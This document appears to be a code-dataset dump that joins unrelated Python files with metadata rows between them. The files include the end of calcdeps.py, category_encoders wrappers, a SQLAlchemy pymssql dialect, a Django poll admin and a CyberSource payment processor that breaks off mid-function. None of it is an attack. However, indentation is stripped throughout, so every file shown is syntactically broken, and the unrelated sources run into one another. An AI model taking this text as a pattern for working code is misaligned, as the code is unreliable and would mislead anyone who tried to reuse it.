"""Filters the given files by the exlusions specified at the command line.
Args:
options: The flags to calcdeps.
files: The files to filter.
Returns:
A list of files.
"""
excludes = []
if options.excludes:
excludes = ExpandDirectories(options.excludes)
excludesSet = set(excludes)
return [i for i in files if not i in excludesSet]
def GetPathsFromOptions(options):
"""Generates the path files from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of files in the specified paths. (strings).
"""
search_paths = options.paths
if not search_paths:
search_paths = ['.'] # Add default folder if no path is specified.
search_paths = ExpandDirectories(search_paths)
return FilterByExcludes(options, search_paths)
def GetInputsFromOptions(options):
"""Generates the inputs from flag options.
Args:
options: The flags to calcdeps.
Returns:
A list of inputs (strings).
"""
inputs = options.inputs
if not inputs: # Parse stdin
logging.info('No inputs specified. Reading from stdin...')
inputs = filter(None, [line.strip('\n') for line in sys.stdin.readlines()])
logging.info('Scanning files...')
inputs = ExpandDirectories(inputs)
return FilterByExcludes(options, inputs)
def Compile(compiler_jar_path, source_paths, out, flags=None):
"""Prepares command-line call to Closure compiler.
Args:
compiler_jar_path: Path to the Closure compiler .jar file.
source_paths: Source paths to build, in order.
flags: A list of additional flags to pass on to Closure compiler.
"""
args = ['java', '-jar', compiler_jar_path]
for path in source_paths:
args += ['--js', path]
if flags:
args += flags
logging.info('Compiling with the following command: %s', ' '.join(args))
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
(stdoutdata, stderrdata) = proc.communicate()
if proc.returncode != 0:
logging.error('JavaScript compilation failed.')
sys.exit(1)
else:
out.write(stdoutdata.decode('utf-8'))
def main():
"""The entrypoint for this script."""
logging.basicConfig(format='calcdeps.py: %(message)s', level=logging.INFO)
usage = 'usage: %prog [options] arg'
parser = optparse.OptionParser(usage)
parser.add_option('-i',
'--input',
dest='inputs',
action='append',
help='The inputs to calculate dependencies for. Valid '
'values can be files, directories, or namespaces '
'(ns:goog.net.XhrIo). Only relevant to "list" and '
'"script" output.')
parser.add_option('-p',
'--path',
dest='paths',
action='append',
help='The paths that should be traversed to build the '
'dependencies.')
parser.add_option('-d',
'--dep',
dest='deps',
action='append',
help='Directories or files that should be traversed to '
'find required dependencies for the deps file. '
'Does not generate dependency information for names '
'provided by these files. Only useful in "deps" mode.')
parser.add_option('-e',
'--exclude',
dest='excludes',
action='append',
help='Files or directories to exclude from the --path '
'and --input flags')
parser.add_option('-o',
'--output_mode',
dest='output_mode',
action='store',
default='list',
help='The type of output to generate from this script. '
'Options are "list" for a list of filenames, "script" '
'for a single script containing the contents of all the '
'file, "deps" to generate a deps.js file for all '
'paths, or "compiled" to produce compiled output with '
'the Closure compiler.')
parser.add_option('-c',
'--compiler_jar',
dest='compiler_jar',
action='store',
help='The location of the Closure compiler .jar file.')
parser.add_option('-f',
'--compiler_flag',
'--compiler_flags', # for backwards compatability
dest='compiler_flags',
action='append',
help='Additional flag to pass to the Closure compiler. '
'May be specified multiple times to pass multiple flags.')
parser.add_option('--output_file',
dest='output_file',
action='store',
help=('If specified, write output to this path instead of '
'writing to standard output.'))
(options, args) = parser.parse_args()
search_paths = GetPathsFromOptions(options)
if options.output_file:
out = open(options.output_file, 'w')
else:
out = sys.stdout
if options.output_mode == 'deps':
result = PrintDeps(search_paths, ExpandDirectories(options.deps or []), out)
if not result:
logging.error('Could not find Closure Library in the specified paths')
sys.exit(1)
return
inputs = GetInputsFromOptions(options)
logging.info('Finding Closure dependencies...')
deps = CalculateDependencies(search_paths, inputs)
output_mode = options.output_mode
if output_mode == 'script':
PrintScript(deps, out)
elif output_mode == 'list':
# Just print out a dep per line
for dep in deps:
PrintLine(dep, out)
elif output_mode == 'compiled':
# Make sure a .jar is specified.
if not options.compiler_jar:
logging.error('--compiler_jar flag must be specified if --output is '
'"compiled"')
sys.exit(1)
# User friendly version check.
if distutils and not (distutils.version.LooseVersion(GetJavaVersion()) >
distutils.version.LooseVersion('1.6')):
logging.error('Closure Compiler requires Java 1.6 or higher.')
logging.error('Please visit http://www.java.com/getjava')
sys.exit(1)
Compile(options.compiler_jar, deps, out, options.compiler_flags)
else:
logging.error('Invalid value for --output flag.')
sys.exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,585,227,829,057,054,000 | 30.484746 | 80 | 0.652132 | false |
scikit-learn-contrib/categorical-encoding | category_encoders/wrapper.py | 1 | 11845 | import copy
from category_encoders import utils
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import StratifiedKFold
import category_encoders as encoders
import pandas as pd
import numpy as np
class PolynomialWrapper(BaseEstimator, TransformerMixin):
"""Extend supervised encoders to n-class labels, where n >= 2.
The label can be numerical (e.g.: 0, 1, 2, 3,...,n), string or categorical (pandas.Categorical).
The label is first encoded into n-1 binary columns. Subsequently, the inner supervised encoder
is executed for each binarized label.
The names of the encoded features are suffixed with underscore and the corresponding class name
(edge scenarios like 'dog'+'cat_frog' vs. 'dog_cat'+'frog' are not currently handled).
The implementation is experimental and the API may change in the future.
The order of the returned features may change in the future.
Parameters
----------
feature_encoder: Object
an instance of a supervised encoder.
Example
-------
>>> from category_encoders import *
>>> import pandas as pd
>>> from sklearn.datasets import load_boston
>>> from category_encoders.wrapper import PolynomialWrapper
>>> bunch = load_boston()
>>> y = bunch.target
>>> y = (y/10).round().astype(int) # we create 6 artificial classes
>>> X = pd.DataFrame(bunch.data, columns=bunch.feature_names)
>>> enc = TargetEncoder(cols=['CHAS', 'RAD'])
>>> wrapper = PolynomialWrapper(enc)
>>> encoded =wrapper.fit_transform(X, y)
>>> print(encoded.info())
"""
def __init__(self, feature_encoder):
self.feature_encoder = feature_encoder
self.feature_encoders = {}
self.label_encoder = None
def fit(self, X, y, **kwargs):
# unite the input into pandas types
X = utils.convert_input(X)
y = utils.convert_input(y)
y.columns = ['target']
# apply one-hot-encoder on the label
self.label_encoder = encoders.OneHotEncoder(handle_missing='error', handle_unknown='error', cols=['target'], drop_invariant=True,
use_cat_names=True)
labels = self.label_encoder.fit_transform(y)
labels.columns = [column[7:] for column in labels.columns]
labels = labels.iloc[:, 1:] # drop one label
# train the feature encoders
for class_name, label in labels.iteritems():
self.feature_encoders[class_name] = copy.deepcopy(self.feature_encoder).fit(X, label)
def transform(self, X):
# unite the input into pandas types
X = utils.convert_input(X)
# initialization
encoded = None
feature_encoder = None
all_new_features = pd.DataFrame()
# transform the features
for class_name, feature_encoder in self.feature_encoders.items():
encoded = feature_encoder.transform(X)
# decorate the encoded features with the label class suffix
new_features = encoded[feature_encoder.cols]
new_features.columns = [str(column) + '_' + class_name for column in new_features.columns]
all_new_features = pd.concat((all_new_features, new_features), axis=1)
# add features that were not encoded
result = pd.concat((encoded[encoded.columns[~encoded.columns.isin(feature_encoder.cols)]], all_new_features), axis=1)
return result
def fit_transform(self, X, y=None, **fit_params):
# When we are training the feature encoders, we have to use fit_transform() method on the features.
# unite the input into pandas types
X = utils.convert_input(X)
y = utils.convert_input(y)
y.columns = ['target']
# apply one-hot-encoder on the label
self.label_encoder = encoders.OneHotEncoder(handle_missing='error', handle_unknown='error', cols=['target'], drop_invariant=True,
use_cat_names=True)
labels = self.label_encoder.fit_transform(y)
labels.columns = [column[7:] for column in labels.columns]
labels = labels.iloc[:, 1:] # drop one label
# initialization of the feature encoders
encoded = None
feature_encoder = None
all_new_features = pd.DataFrame()
# fit_transform the feature encoders
for class_name, label in labels.iteritems():
feature_encoder = copy.deepcopy(self.feature_encoder)
encoded = feature_encoder.fit_transform(X, label)
# decorate the encoded features with the label class suffix
new_features = encoded[feature_encoder.cols]
new_features.columns = [str(column) + '_' + class_name for column in new_features.columns]
all_new_features = pd.concat((all_new_features, new_features), axis=1)
self.feature_encoders[class_name] = feature_encoder
# add features that were not encoded
result = pd.concat((encoded[encoded.columns[~encoded.columns.isin(feature_encoder.cols)]], all_new_features), axis=1)
return result
class NestedCVWrapper(BaseEstimator, TransformerMixin):
"""
Extends supervised encoders with the nested cross validation on the training data to minimise overfitting.
For a validation or a test set, supervised encoders can be used as follows:
X_train_encoded = encoder.fit_transform(X_train, y_train)
X_valid_encoded = encoder.transform(X_valid)
However, the downstream model will be overfitting to the encoded training data due to target leakage.
Using out-of-fold encodings is an effective way to prevent target leakage. This is equivalent to:
X_train_encoded = np.zeros(X.shape)
for trn, val in kfold.split(X, y):
encoder.fit(X[trn], y[trn])
X_train_encoded[val] = encoder.transform(X[val])
This can be used in place of the "inner folds" as discussed here:
https://sebastianraschka.com/faq/docs/evaluate-a-model.html
See README.md for a list of supervised encoders.
Discussion: Although leave-one-out encoder internally performs leave-one-out cross-validation, it is
actually the most overfitting supervised model in our library. To illustrate the issue, let's imagine we
have a totally unpredictive nominal feature and a perfectly balanced binary label. A supervised encoder
should encode the feature into a constant vector as the feature is unpredictive of the label. But when we
use leave-one-out cross-validation, the label ratio cease to be perfectly balanced and the wrong class
label always becomes the majority in the training fold. Leave-one-out encoder returns a seemingly
predictive feature. And the downstream model starts to overfit to the encoded feature. Unfortunately,
even 10-fold cross-validation is not immune to this effect:
http://www.kdd.org/exploration_files/v12-02-4-UR-Perlich.pdf
To decrease the effect, it is recommended to use a low count of the folds. And that is the reason why
this wrapper uses 5 folds by default.
Based on the empirical results, only LeaveOneOutEncoder benefits greatly from this wrapper. The remaining
encoders can be used without this wrapper.
Parameters
----------
feature_encoder: Object
an instance of a supervised encoder.
cv: int or sklearn cv Object
if an int is given, StratifiedKFold is used by default, where the int is the number of folds.
shuffle: boolean, optional
whether to shuffle each classes samples before splitting into batches. Ignored if a CV method is provided.
random_state: int, RandomState instance or None, optional, default=None
if int, random_state is the seed used by the random number generator. Ignored if a CV method is provided.
Example
-------
>>> from category_encoders import *
>>> from category_encoders.wrapper import NestedCVWrapper
>>> from sklearn.datasets import load_boston
>>> from sklearn.model_selection import GroupKFold, train_test_split
>>> bunch = load_boston()
>>> y = bunch.target
>>> # we create 6 artificial classes and a train/validation/test split
>>> y = (y/10).round().astype(int)
>>> X = pd.DataFrame(bunch.data, columns=bunch.feature_names)
>>> X_train, X_test, y_train, _ = train_test_split(X, y)
>>> X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train)
>>> # Define the nested CV encoder for a supervised encoder
>>> enc_nested = NestedCVWrapper(TargetEncoder(cols=['CHAS', 'RAD']), random_state=42)
>>> # Encode the X data for train, valid & test
>>> X_train_enc, X_valid_enc, X_test_enc = enc_nested.fit_transform(X_train, y_train, X_test=(X_valid, X_test))
>>> print(X_train_enc.info())
"""
def __init__(self, feature_encoder, cv=5, shuffle=True, random_state=None):
self.feature_encoder = feature_encoder
self.__name__ = feature_encoder.__class__.__name__
if type(cv) == int:
self.cv = StratifiedKFold(n_splits=cv, shuffle=shuffle, random_state=random_state)
else:
self.cv = cv
def fit(self, X, y, **kwargs):
"""
Calls fit on the base feature_encoder without nested cross validation
"""
self.feature_encoder.fit(X, y, **kwargs)
def transform(self, X):
"""
Calls transform on the base feature_encoder without nested cross validation
"""
return self.feature_encoder.transform(X)
def fit_transform(self, X, y=None, X_test=None, groups=None, **fit_params):
"""
Creates unbiased encodings from a supervised encoder as well as infer encodings on a test set
:param X: array-like, shape = [n_samples, n_features]
Training vectors for the supervised encoder, where n_samples is the number of samples
and n_features is the number of features.
:param y: array-like, shape = [n_samples]
Target values for the supervised encoder.
:param X_test, optional: array-like, shape = [m_samples, n_features] or a tuple of array-likes (X_test, X_valid...)
Vectors to be used for inference by an encoder (e.g. test or validation sets) trained on the
full X & y sets. No nested folds are used here
:param groups: Groups to be passed to the cv method, e.g. for GroupKFold
:param fit_params:
:return: array, shape = [n_samples, n_numeric + N]
Transformed values with encoding applied. Returns multiple arrays if X_test is not None
"""
X = utils.convert_input(X)
y = utils.convert_input(y)
# Get out-of-fold encoding for the training data
out_of_fold = np.zeros(X.shape)
for trn_idx, oof_idx in self.cv.split(X, y, groups):
feature_encoder = copy.deepcopy(self.feature_encoder)
feature_encoder.fit(X.iloc[trn_idx], y.iloc[trn_idx])
out_of_fold[oof_idx] = feature_encoder.transform(X.iloc[oof_idx])
out_of_fold = pd.DataFrame(out_of_fold, columns=X.columns)
# Train the encoder on all the training data for testing data
self.feature_encoder = copy.deepcopy(self.feature_encoder)
self.feature_encoder.fit(X, y)
if X_test is None:
return out_of_fold
else:
if type(X_test) == tuple:
encoded_data = (out_of_fold, )
for dataset in X_test:
encoded_data = encoded_data + (self.feature_encoder.transform(dataset), )
return encoded_data
else:
return out_of_fold, self.feature_encoder.transform(X_test)
| bsd-3-clause | -3,160,571,149,759,760,400 | 43.363296 | 137 | 0.651836 | false |
evanma92/routeh | flask/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/pymssql.py | 21 | 2968 | # mssql/pymssql.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql+pymssql
:name: pymssql
:dbapi: pymssql
:connectstring: mssql+pymssql://<username>:<password>@<freetds_name>?\
charset=utf8
:url: http://pymssql.org/
pymssql is a Python module that provides a Python DBAPI interface around
`FreeTDS <http://www.freetds.org/>`_. Compatible builds are available for
Linux, MacOSX and Windows platforms.
"""
from .base import MSDialect
from ... import types as sqltypes, util, processors
import re
class _MSNumeric_pymssql(sqltypes.Numeric):
def result_processor(self, dialect, type_):
if not self.asdecimal:
return processors.to_float
else:
return sqltypes.Numeric.result_processor(self, dialect, type_)
class MSDialect_pymssql(MSDialect):
supports_sane_rowcount = False
driver = 'pymssql'
colspecs = util.update_copy(
MSDialect.colspecs,
{
sqltypes.Numeric: _MSNumeric_pymssql,
sqltypes.Float: sqltypes.Float,
}
)
@classmethod
def dbapi(cls):
module = __import__('pymssql')
# pymmsql doesn't have a Binary method. we use string
# TODO: monkeypatching here is less than ideal
module.Binary = lambda x: x if hasattr(x, 'decode') else str(x)
client_ver = tuple(int(x) for x in module.__version__.split("."))
if client_ver < (1, ):
util.warn("The pymssql dialect expects at least "
"the 1.0 series of the pymssql DBAPI.")
return module
def __init__(self, **params):
super(MSDialect_pymssql, self).__init__(**params)
self.use_scope_identity = True
def _get_server_version_info(self, connection):
vers = connection.scalar("select @@version")
m = re.match(
r"Microsoft .*? - (\d+).(\d+).(\d+).(\d+)", vers)
if m:
return tuple(int(x) for x in m.group(1, 2, 3, 4))
else:
return None
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
opts.update(url.query)
port = opts.pop('port', None)
if port and 'host' in opts:
opts['host'] = "%s:%s" % (opts['host'], port)
return [[], opts]
def is_disconnect(self, e, connection, cursor):
for msg in (
"Adaptive Server connection timed out",
"Net-Lib error during Connection reset by peer",
"message 20003", # connection timeout
"Error 10054",
"Not connected to any MS SQL server",
"Connection is closed"
):
if msg in str(e):
return True
else:
return False
dialect = MSDialect_pymssql
| bsd-3-clause | -1,464,268,305,426,568,400 | 30.574468 | 74 | 0.598383 | false |
lafranceinsoumise/api-django | agir/polls/admin.py | 1 | 1207 | from django import forms
from django.contrib import admin
from django.utils.html import format_html
from django.utils.translation import ugettext as _
from agir.api.admin import admin_site
from agir.lib.form_fields import AdminJsonWidget, RichEditorWidget
from agir.lib.models import DescriptionField
from .models import Poll, PollOption
from agir.lib.utils import front_url
class PollOptionInline(admin.TabularInline):
model = PollOption
extra = 1
class PollAdminForm(forms.ModelForm):
class Meta:
widgets = {"rules": AdminJsonWidget()}
@admin.register(Poll, site=admin_site)
class PollAdmin(admin.ModelAdmin):
form = PollAdminForm
inlines = [PollOptionInline]
list_display = ("title", "start", "end")
fields = [
"title",
"link",
"description",
"confirmation_note",
"start",
"end",
"rules",
"tags",
]
readonly_fields = ["link"]
def link(self, object):
if object.pk:
return format_html(
'<a href="{url}">{text}</a>',
url=front_url("participate_poll", args=[object.pk]),
text=_("Voir la consultation"),
)
| agpl-3.0 | 7,769,119,875,542,626,000 | 23.632653 | 68 | 0.628003 | false |
eduNEXT/edunext-ecommerce | ecommerce/extensions/payment/processors/cybersource.py | 1 | 24294 | """ CyberSource payment processing. """
from __future__ import absolute_import, unicode_literals
import base64
import datetime
import json
import logging
import uuid
from decimal import Decimal
import six
from django.conf import settings
from django.urls import reverse
from oscar.apps.payment.exceptions import GatewayError, TransactionDeclined, UserCancelled
from oscar.core.loading import get_class, get_model
from zeep import Client
from zeep.helpers import serialize_object
from zeep.wsse import UsernameToken
from ecommerce.core.constants import ISO_8601_FORMAT
from ecommerce.core.url_utils import get_ecommerce_url
from ecommerce.extensions.checkout.utils import get_receipt_page_url
from ecommerce.extensions.payment.constants import APPLE_PAY_CYBERSOURCE_CARD_TYPE_MAP, CYBERSOURCE_CARD_TYPE_MAP
from ecommerce.extensions.payment.exceptions import (
AuthorizationError,
DuplicateReferenceNumber,
ExcessivePaymentForOrderError,
InvalidCybersourceDecision,
InvalidSignatureError,
PartialAuthorizationError,
PCIViolation,
ProcessorMisconfiguredError,
RedundantPaymentNotificationError
)
from ecommerce.extensions.payment.helpers import sign
from ecommerce.extensions.payment.processors import (
ApplePayMixin,
BaseClientSidePaymentProcessor,
HandledProcessorResponse
)
from ecommerce.extensions.payment.utils import clean_field_value, get_basket_program_uuid
logger = logging.getLogger(__name__)
Order = get_model('order', 'Order')
OrderNumberGenerator = get_class('order.utils', 'OrderNumberGenerator')
PaymentProcessorResponse = get_model('payment', 'PaymentProcessorResponse')
class Cybersource(ApplePayMixin, BaseClientSidePaymentProcessor):
"""
CyberSource Secure Acceptance Web/Mobile (February 2015)
For reference, see
http://apps.cybersource.com/library/documentation/dev_guides/Secure_Acceptance_WM/Secure_Acceptance_WM.pdf.
"""
NAME = 'cybersource'
PCI_FIELDS = ('card_cvn', 'card_expiry_date', 'card_number', 'card_type',)
def __init__(self, site):
"""
Constructs a new instance of the CyberSource processor.
Raises:
KeyError: If no settings configured for this payment processor
AttributeError: If LANGUAGE_CODE setting is not set.
"""
super(Cybersource, self).__init__(site)
configuration = self.configuration
self.soap_api_url = configuration['soap_api_url']
self.merchant_id = configuration['merchant_id']
self.transaction_key = configuration['transaction_key']
self.send_level_2_3_details = configuration.get('send_level_2_3_details', True)
self.language_code = settings.LANGUAGE_CODE
# Secure Acceptance parameters
# NOTE: Silent Order POST is the preferred method of checkout as it allows us to completely control
# the checkout UX. Secure Acceptance, on the other hand, redirects the purchaser to a page controlled
# by CyberSource.
self.profile_id = configuration.get('profile_id')
self.access_key = configuration.get('access_key')
self.secret_key = configuration.get('secret_key')
self.payment_page_url = configuration.get('payment_page_url')
# Silent Order POST parameters
self.sop_profile_id = configuration.get('sop_profile_id')
self.sop_access_key = configuration.get('sop_access_key')
self.sop_secret_key = configuration.get('sop_secret_key')
self.sop_payment_page_url = configuration.get('sop_payment_page_url')
sa_configured = all((self.access_key, self.payment_page_url, self.profile_id, self.secret_key))
sop_configured = all([self.sop_access_key, self.sop_payment_page_url, self.sop_profile_id, self.sop_secret_key])
assert sop_configured or sa_configured, \
'CyberSource processor must be configured for Silent Order POST and/or Secure Acceptance'
# Apple Pay configuration
self.apple_pay_enabled = self.site.siteconfiguration.enable_apple_pay
self.apple_pay_merchant_identifier = configuration.get('apple_pay_merchant_identifier', '')
self.apple_pay_merchant_id_certificate_path = configuration.get('apple_pay_merchant_id_certificate_path', '')
self.apple_pay_country_code = configuration.get('apple_pay_country_code', '')
@property
def cancel_page_url(self):
return get_ecommerce_url(self.configuration['cancel_checkout_path'])
@property
def client_side_payment_url(self):
return self.sop_payment_page_url
def get_transaction_parameters(self, basket, request=None, use_client_side_checkout=False, **kwargs):
"""
Generate a dictionary of signed parameters CyberSource requires to complete a transaction.
Arguments:
use_client_side_checkout:
basket (Basket): The basket of products being purchased.
request (Request, optional): A Request object which could be used to construct an absolute URL; not
used by this method.
use_client_side_checkout (bool, optional): Indicates if the Silent Order POST profile should be used.
**kwargs: Additional parameters.
Keyword Arguments:
extra_parameters (dict): Additional signed parameters that should be included in the signature
and returned dict. Note that these parameters will override any default values.
Returns:
dict: CyberSource-specific parameters required to complete a transaction, including a signature.
"""
sop_config_values = (self.sop_access_key, self.sop_payment_page_url, self.sop_profile_id, self.sop_secret_key,)
if use_client_side_checkout and not all(sop_config_values):
raise ProcessorMisconfiguredError(
'CyberSource Silent Order POST cannot be used unless a profile ID, access key, '
'secret key, and payment page URL are ALL configured in settings.'
)
parameters = self._generate_parameters(basket, use_client_side_checkout, **kwargs)
# Sign all fields
parameters['signed_field_names'] = ','.join(sorted(parameters.keys()))
parameters['signature'] = self._generate_signature(parameters, use_client_side_checkout)
payment_page_url = self.sop_payment_page_url if use_client_side_checkout else self.payment_page_url
parameters['payment_page_url'] = payment_page_url
return parameters
def _generate_parameters(self, basket, use_sop_profile, **kwargs):
""" Generates the parameters dict.
A signature is NOT included in the parameters.
Arguments:
basket (Basket): Basket from which the pricing and item details are pulled.
use_sop_profile (bool, optional): Indicates if the Silent Order POST profile should be used.
**kwargs: Additional parameters to add to the generated dict.
Returns:
dict: Dictionary containing the payment parameters that should be sent to CyberSource.
"""
site = basket.site
access_key = self.access_key
profile_id = self.profile_id
if use_sop_profile:
access_key = self.sop_access_key
profile_id = self.sop_profile_id
parameters = {
'access_key': access_key,
'profile_id': profile_id,
'transaction_uuid': uuid.uuid4().hex,
'signed_field_names': '',
'unsigned_field_names': '',
'signed_date_time': datetime.datetime.utcnow().strftime(ISO_8601_FORMAT),
'locale': self.language_code,
'transaction_type': 'sale',
'reference_number': basket.order_number,
'amount': str(basket.total_incl_tax),
'currency': basket.currency,
'override_custom_receipt_page': get_receipt_page_url(
site_configuration=site.siteconfiguration,
order_number=basket.order_number,
override_url=site.siteconfiguration.build_ecommerce_url(
reverse('cybersource:redirect')
),
disable_back_button=True,
),
'override_custom_cancel_page': self.cancel_page_url,
}
extra_data = []
# Level 2/3 details
if self.send_level_2_3_details:
parameters['amex_data_taa1'] = site.name
parameters['purchasing_level'] = '3'
parameters['line_item_count'] = basket.all_lines().count()
# Note (CCB): This field (purchase order) is required for Visa;
# but, is not actually used by us/exposed on the order form.
parameters['user_po'] = 'BLANK'
# Add a parameter specifying the basket's program, None if not present.
# This program UUID will *always* be in the merchant_defined_data1, if exists.
program_uuid = get_basket_program_uuid(basket)
if program_uuid:
extra_data.append("program,{program_uuid}".format(program_uuid=program_uuid))
else:
extra_data.append(None)
for index, line in enumerate(basket.all_lines()):
parameters['item_{}_code'.format(index)] = line.product.get_product_class().slug
parameters['item_{}_discount_amount '.format(index)] = str(line.discount_value)
# Note (CCB): This indicates that the total_amount field below includes tax.
parameters['item_{}_gross_net_indicator'.format(index)] = 'Y'
parameters['item_{}_name'.format(index)] = clean_field_value(line.product.title)
parameters['item_{}_quantity'.format(index)] = line.quantity
parameters['item_{}_sku'.format(index)] = line.stockrecord.partner_sku
parameters['item_{}_tax_amount'.format(index)] = str(line.line_tax)
parameters['item_{}_tax_rate'.format(index)] = '0'
parameters['item_{}_total_amount '.format(index)] = str(line.line_price_incl_tax_incl_discounts)
# Note (CCB): Course seat is not a unit of measure. Use item (ITM).
parameters['item_{}_unit_of_measure'.format(index)] = 'ITM'
parameters['item_{}_unit_price'.format(index)] = str(line.unit_price_incl_tax)
# For each basket line having a course product, add course_id and course type
# as an extra CSV-formatted parameter sent to Cybersource.
# These extra course parameters will be in parameters merchant_defined_data2+.
line_course = line.product.course
if line_course:
extra_data.append("course,{course_id},{course_type}".format(
course_id=line_course.id if line_course else None,
course_type=line_course.type if line_course else None
))
# Only send consumer_id for hosted payment page
if not use_sop_profile:
parameters['consumer_id'] = basket.owner.username
# Add the extra parameters
parameters.update(kwargs.get('extra_parameters', {}))
# Mitigate PCI compliance issues
signed_field_names = list(parameters.keys())
if any(pci_field in signed_field_names for pci_field in self.PCI_FIELDS):
raise PCIViolation('One or more PCI-related fields is contained in the payment parameters. '
'This service is NOT PCI-compliant! Deactivate this service immediately!')
if extra_data:
# CyberSource allows us to send additional data in merchant_defined_data# fields.
for num, item in enumerate(extra_data, start=1):
if item:
key = u"merchant_defined_data{num}".format(num=num)
parameters[key] = item
return parameters
def handle_processor_response(self, response, basket=None):
"""
Handle a response (i.e., "merchant notification") from CyberSource.
Arguments:
response (dict): Dictionary of parameters received from the payment processor.
Keyword Arguments:
basket (Basket): Basket being purchased via the payment processor.
Raises:
AuthorizationError: Authorization was declined.
UserCancelled: Indicates the user cancelled payment.
TransactionDeclined: Indicates the payment was declined by the processor.
GatewayError: Indicates a general error on the part of the processor.
InvalidCyberSourceDecision: Indicates an unknown decision value.
Known values are ACCEPT, CANCEL, DECLINE, ERROR, REVIEW.
PartialAuthorizationError: Indicates only a portion of the requested amount was authorized.
Returns:
HandledProcessorResponse
"""
# Validate the signature
if not self.is_signature_valid(response):
raise InvalidSignatureError
# Raise an exception for payments that were not accepted. Consuming code should be responsible for handling
# and logging the exception.
decision = response['decision'].lower()
if decision != 'accept':
reason_code = int(response['reason_code'])
if decision == 'error' and reason_code == 104:
# This means user submitted payment request twice within 15 min.
# We need to check if user first payment notification was handled successfuly and user has an order
# if user has an order we can raise DuplicateReferenceNumber exception else we need to continue
# the order creation process. to upgrade user in correct course mode.
if Order.objects.filter(number=response['req_reference_number']).exists():
raise DuplicateReferenceNumber
logger.info(
'Received duplicate CyberSource payment notification for basket [%d] which is not associated '
'with any existing order. Continuing to validation and order creation processes.',
basket.id,
)
else:
raise {
'cancel': UserCancelled,
'decline': TransactionDeclined,
'error': GatewayError,
'review': AuthorizationError,
}.get(decision, InvalidCybersourceDecision)
transaction_id = response.get('transaction_id', '') # Error Notifications do not include a transaction id.
if transaction_id and decision == 'accept':
if Order.objects.filter(number=response['req_reference_number']).exists():
if PaymentProcessorResponse.objects.filter(transaction_id=transaction_id).exists():
raise RedundantPaymentNotificationError
raise ExcessivePaymentForOrderError
if 'auth_amount' in response and response['auth_amount'] and response['auth_amount'] != response['req_amount']:
# Raise an exception if the authorized amount differs from the requested amount.
# Note (CCB): We should never reach this point in production since partial authorization is disabled
# for our account, and should remain that way until we have a proper solution to allowing users to
# complete authorization for the entire order
raise PartialAuthorizationError
currency = response['req_currency']
total = Decimal(response['req_amount'])
card_number = response['req_card_number']
card_type = CYBERSOURCE_CARD_TYPE_MAP.get(response['req_card_type'])
return HandledProcessorResponse(
transaction_id=transaction_id,
total=total,
currency=currency,
card_number=card_number,
card_type=card_type
)
def _generate_signature(self, parameters, use_sop_profile):
"""
Sign the contents of the provided transaction parameters dictionary.
This allows CyberSource to verify that the transaction parameters have not been tampered with
during transit. The parameters dictionary should contain a key 'signed_field_names' which CyberSource
uses to validate the signature. The message to be signed must contain parameter keys and values ordered
in the same way they appear in 'signed_field_names'.
We also use this signature to verify that the signature we get back from Cybersource is valid for
the parameters that they are giving to us.
Arguments:
parameters (dict): A dictionary of transaction parameters.
use_sop_profile (bool): Indicates if the Silent Order POST profile should be used.
Returns:
unicode: the signature for the given parameters
"""
order_number = None
basket_id = None
if 'reference_number' in parameters:
order_number = parameters['reference_number']
elif 'req_reference_number' in parameters:
order_number = parameters['req_reference_number']
if order_number:
basket_id = str(OrderNumberGenerator().basket_id(order_number))
logger.info(
'Signing CyberSource payment data for basket [%s], to become order [%s].',
basket_id,
order_number
)
keys = parameters['signed_field_names'].split(',')
secret_key = self.sop_secret_key if use_sop_profile else self.secret_key
# Generate a comma-separated list of keys and values to be signed. CyberSource refers to this
# as a 'Version 1' signature in their documentation.
message = ','.join(['{key}={value}'.format(key=key, value=parameters.get(key)) for key in keys])
return sign(message, secret_key)
def is_signature_valid(self, response):
"""Returns a boolean indicating if the response's signature (indicating potential tampering) is valid."""
req_profile_id = response.get('req_profile_id')
if not req_profile_id:
return False
use_sop_profile = req_profile_id == self.sop_profile_id
return response and (self._generate_signature(response, use_sop_profile) == response.get('signature'))
def issue_credit(self, order_number, basket, reference_number, amount, currency):
try:
client = Client(self.soap_api_url, wsse=UsernameToken(self.merchant_id, self.transaction_key))
credit_service = {
'captureRequestID': reference_number,
'run': 'true',
}
purchase_totals = {
'currency': currency,
'grandTotalAmount': six.text_type(amount),
}
response = client.service.runTransaction(
merchantID=self.merchant_id,
merchantReferenceCode=order_number,
orderRequestToken=reference_number,
ccCreditService=credit_service,
purchaseTotals=purchase_totals
)
request_id = response.requestID
ppr = self.record_processor_response(serialize_object(response), transaction_id=request_id,
basket=basket)
except:
msg = 'An error occurred while attempting to issue a credit (via CyberSource) for order [{}].'.format(
order_number)
logger.exception(msg)
raise GatewayError(msg)
if response.decision == 'ACCEPT':
return request_id
raise GatewayError(
'Failed to issue CyberSource credit for order [{order_number}]. '
'Complete response has been recorded in entry [{response_id}]'.format(
order_number=order_number, response_id=ppr.id))
def request_apple_pay_authorization(self, basket, billing_address, payment_token):
"""
Authorizes an Apple Pay payment.
For details on the process, see the CyberSource Simple Order API documentation at
https://www.cybersource.com/developers/integration_methods/apple_pay/.
Args:
basket (Basket)
billing_address (BillingAddress)
payment_token (dict)
Returns:
HandledProcessorResponse
Raises:
GatewayError
"""
try:
client = Client(self.soap_api_url, wsse=UsernameToken(self.merchant_id, self.transaction_key))
card_type = APPLE_PAY_CYBERSOURCE_CARD_TYPE_MAP[payment_token['paymentMethod']['network'].lower()]
bill_to = {
'firstName': billing_address.first_name,
'lastName': billing_address.last_name,
'street1': billing_address.line1,
'street2': billing_address.line2,
'city': billing_address.line4,
'state': billing_address.state,
'postalCode': billing_address.postcode,
'country': billing_address.country.iso_3166_1_a2,
'email': basket.owner.email,
}
purchase_totals = {
'currency': basket.currency,
'grandTotalAmount': str(basket.total_incl_tax),
}
encrypted_payment = {
'descriptor': 'RklEPUNPTU1PTi5BUFBMRS5JTkFQUC5QQVlNRU5U',
'data': base64.b64encode(json.dumps(payment_token['paymentData']).encode('utf-8')),
'encoding': 'Base64',
}
card = {
'cardType': card_type,
}
auth_service = {
